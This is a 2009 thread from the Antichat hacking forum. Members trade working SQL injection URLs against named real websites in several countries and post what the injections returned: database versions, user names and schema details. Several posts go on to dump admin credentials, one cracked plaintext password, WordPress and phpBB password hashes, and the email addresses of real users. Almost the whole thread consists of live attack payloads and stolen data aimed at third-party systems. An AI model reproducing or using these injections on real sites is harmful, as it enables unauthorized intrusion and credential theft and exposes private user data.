Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.06.2009, 08:20
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
третья мускуль
http://www.bicentenary.tas.gov.au/text.php?id=66+and+substring(version(),1,1)=3
|
|
|
10.06.2009, 12:31
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.akpr.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
u44790@10.10.223.230:u44790:5.0.67-log
Код:
http://www.newchemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
u44790@10.10.223.230:u44790_3:5.0.67-log
Код:
http://polymery.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
u44790@10.10.223.230:u44790:5.0.67-log
Код:
http://petrochemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
u44790@10.10.223.230:u44790_2:5.0.67-log
Последний раз редактировалось mailbrush; 10.06.2009 в 12:44..
|
|
|
|
10.06.2009, 12:54
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
PR 6
Код:
http://www.mhfa.com.au/instructor_details.php?id=-694+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/*
Database version : 4.1.22-standard-log
Database name : mhfa_db
User name : mhfa@10.194.10.112
|
|
|
|
10.06.2009, 13:13
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
Код:
http://php.louisville.edu/news/multimedia/multimedia.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11/*
Database Version: 5.0.27-standard
Database name: releases
User name: releases@136.165.237.189 |
|
|
|
10.06.2009, 13:19
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
PR3
http://mywebs.ru/text.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5
5.0.67-log:u50510@10.10.153.173:u50510
-------------
Решил пройтись слегка по разделу Портфолио... нашел ещё несколько уязвимых сайтов:
PR4, ТИЦ 130
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database())
5.0.67-log:u83453@10.10.223.247:u83453
Заинтересовала таблица: pixelpost_config
Выдираем данные
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,id,admin,password ,email)+from+pixelpost_config
1:admin:e807f1fcf82d132f9bb018ca6738a19f:test@eer. ru
Расшифровываем:
e807f1fcf82d132f9bb018ca6738a19f = 1234567890
Есть вход админский через http://triluchnik.ru/admin
там авторизация видимо через .htaccess, с указанными данными не получается.
|
|
|
|
10.06.2009, 15:02
|
|
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087
Репутация:
12
|
|
www.surf2surf.co.nz
[PR=4]
Код:
http://www.surf2surf.co.nz/page.php?id=-111+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5,6,7
Версия - 5.0.45
Юзер - surf2surf@localhost
БД - surf2surf
P.S. доступ к табличкам закрыт
|
|
|
|
10.06.2009, 15:10
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
PR2, ТИЦ 40
http://nissanbu.ru/show_new.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4
4.0.27-max-log:nissan60@v52.valuehost.ru:nissan60
------
PR2, ТИЦ 90
http://www.honda.spb.ru/news-text.php?id=-158+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7
4.1.22:ralfart@localhost:ralfart
p.s. Dimonx есть таблица admanager с кучей таблицей, всё доступно. кавыряй.
Последний раз редактировалось AlexSatter; 10.06.2009 в 15:16..
|
|
|
|
10.06.2009, 15:28
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.promiseland.it/view.php?id=-2975/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
Database Version: 5.0.45-log
Database name: promiseland_news
User name: promise_guest@localhost
|
|
|
|
10.06.2009, 15:43
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
PR1
http://www.akalita.com/press/text.php?id=-4+union+select+1,concat_ws(0xa,version(),user(),da tabase()),3,4,5
5.0.67-log u98256@10.10.153.180 u98256_akalita
Видимо на одном акке, несколько сайтов, которые пока не нашел
Доступно несколько баз данных: u98256,u98256_1981,u98256_blog,u98256_akalita
u98256_blog - вордпрессовская база данных.
вытащил с wp_users админа
1:admin:$P$Bol8Q7tR5wPHFqk6NkjB7R6/7FdLFa0
в других базах ничего касающегося авторизации нет, в конфигах видимо всё прописано.
Последний раз редактировалось AlexSatter; 10.06.2009 в 15:49..
|
|
|
|
10.06.2009, 15:51
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
PR6
Код:
http://corsair.cs.iupui.edu:20191/picturegallery/photo.php?id=-99999+union+select+1,2,3,version(),5/*
Database Version: 5.0.22-standard
Database name: jsellmer_db
User name: jsellmer@localhost
Getting Data from table phpbb_users ( Rows) from database test
Fields username:user_password
[0]:Anonymous:
[1]:arowls:39b35d4edd6999d6bfaf563bfa2bb661
[2]:solivares:b2693d9c2124f3ca9547b897794ac6a1( maya)
[3]:Brian Lewis:2f2b4669f9c0d578a94c9a32fc72f1c8
Getting Data from table userList ( Rows) from database test_db
Fields user  ass:email
[0]:nidodson assword:nidodson@gmail.com
[1]:na3d assword:nidodson@iupui.edu
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
